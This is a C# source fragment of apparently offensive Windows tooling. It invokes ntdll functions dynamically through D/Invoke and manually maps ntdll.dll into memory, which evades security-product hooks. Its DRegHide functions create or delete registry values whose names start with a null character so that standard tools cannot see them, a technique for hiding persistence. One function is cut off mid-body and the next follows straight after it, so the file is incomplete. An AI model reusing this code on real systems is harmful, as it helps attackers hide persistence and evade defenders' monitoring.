public static DInvoke.Data.Native.NTSTATUS NtOpenKey( ref IntPtr keyHandle, STRUCTS.ACCESS_MASK desiredAccess, ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes) { object[] funcargs = { keyHandle, desiredAccess, objectAttributes }; DInvoke.Data.Native.NTSTATUS retvalue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref funcargs); keyHandle = (IntPtr)funcargs[0]; return(retvalue); }
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false) { DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP(); mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll"); try { if (hive == "HKLM") { hive = @"\Registry\Machine"; } else if (hive == "HKCU") { String sid = WindowsIdentity.GetCurrent().User.ToString(); hive = @"\Registry\User\" + sid; } else { throw new Exception("Hive needs to be either HKLM or HKCU"); } if (hiddenKey) { keyName = "\0" + keyName; } String regKey = hive + subKey; IntPtr keyHandle = IntPtr.Zero; STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES(); DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING(); string SID = WindowsIdentity.GetCurrent().User.ToString(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey); IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey)); Marshal.StructureToPtr(UC_RegKey, oaObjectName, true); oa.Length = Marshal.SizeOf(oa); oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE; oa.objectName = oaObjectName; oa.SecurityDescriptor = IntPtr.Zero; oa.SecurityQualityOfService = IntPtr.Zero; DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS(); ref IntPtr rkeyHandle = ref keyHandle; STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS; ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;
public static void DRegHide(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false) { try { if (hive == "HKLM") { hive = @"\Registry\Machine"; } else if (hive == "HKCU") { String sid = WindowsIdentity.GetCurrent().User.ToString(); hive = @"\Registry\User\" + sid; } else { throw new Exception("Hive needs to be either HKLM or HKCU"); } if (hiddenKey) { keyName = "\0" + keyName; } String regKey = hive + subKey; IntPtr keyHandle = IntPtr.Zero; STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES(); DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING(); string SID = WindowsIdentity.GetCurrent().User.ToString(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey); IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey)); Marshal.StructureToPtr(UC_RegKey, oaObjectName, true); oa.Length = Marshal.SizeOf(oa); oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE; oa.objectName = oaObjectName; oa.SecurityDescriptor = IntPtr.Zero; oa.SecurityQualityOfService = IntPtr.Zero; DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS(); retValue = TinyDinvoke.NtOpenKey(ref keyHandle, STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS, ref oa); if (retValue == DInvoke.Data.Native.NTSTATUS.Success) { Console.WriteLine("Handle to " + hive + " succesfully opened!"); String keyValueName = keyName; String keyValueData = keyValue; DInvoke.Data.Native.UNICODE_STRING UC_RegKeyValueName = new DInvoke.Data.Native.UNICODE_STRING(); DInvoke.Data.Native.UNICODE_STRING UC_RegKeyValueData = new DInvoke.Data.Native.UNICODE_STRING(); if (!hiddenKey) { DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKeyValueName, keyValueName); } else { UC_RegKeyValueName.Length = (ushort)(keyValueName.Length * 2); UC_RegKeyValueName.MaximumLength = (ushort)(keyValueName.Length * 2); UC_RegKeyValueName.Buffer = Marshal.StringToCoTaskMemUni(keyValueName); } DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKeyValueData, keyValueData); if (!deleteKey) { retValue = TinyDinvoke.NtSetValueKey(keyHandle, ref UC_RegKeyValueName, 0, STRUCTS.REGISTRY_TYPES.REG_SZ, UC_RegKeyValueData.Buffer, UC_RegKeyValueData.Length); if (retValue == DInvoke.Data.Native.NTSTATUS.Success) { Console.WriteLine("RegKey successfully set"); } } else { retValue = TinyDinvoke.NtDeleteValueKey(keyHandle, ref UC_RegKeyValueName); Console.WriteLine("key deletion status: " + retValue); } Marshal.FreeHGlobal(oa.objectName); TinyDinvoke.NtClose(keyHandle); } else { Console.WriteLine("Regkey not found"); } } catch (Exception e) { Console.WriteLine(e.Message); } }